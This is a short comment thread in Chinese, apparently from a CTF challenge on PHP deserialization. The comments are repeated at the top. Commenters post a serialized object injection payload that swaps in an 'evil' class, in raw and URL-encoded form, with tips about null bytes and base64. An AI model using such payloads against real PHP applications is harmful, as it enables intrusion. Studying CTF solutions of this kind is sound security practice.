看了writeUP,不base64编码一下 真的会遗漏特殊字符,造成反序列化失败
?d=O:5:"lemon":1:{s:11:"%00*%00ClassObj";O:4:"evil":1:{s:10:"%00evil%00data";N;}}
O%3A5%3A%22lemon%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00data%22%3BN%3B%7D%7D
注意%00
简单的反序列化,重构 __constract()指向evil
...
评论
vincentshine 1月前
举报
看了writeUP,不base64编码一下 真的会遗漏特殊字符,造成反序列化失败
绝情且小帅 7月前
举报
?d=O:5:"lemon":1:{s:11:"%00*%00ClassObj";O:4:"evil":1:{s:10:"%00evil%00data";N;}}
vchopin 1年前
举报
O%3A5%3A%22lemon%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00data%22%3BN%3B%7D%7D
chaoge 1年前
举报
注意%00
hopeinhand 1年前
举报
简单的反序列化,重构 __constract()指向evil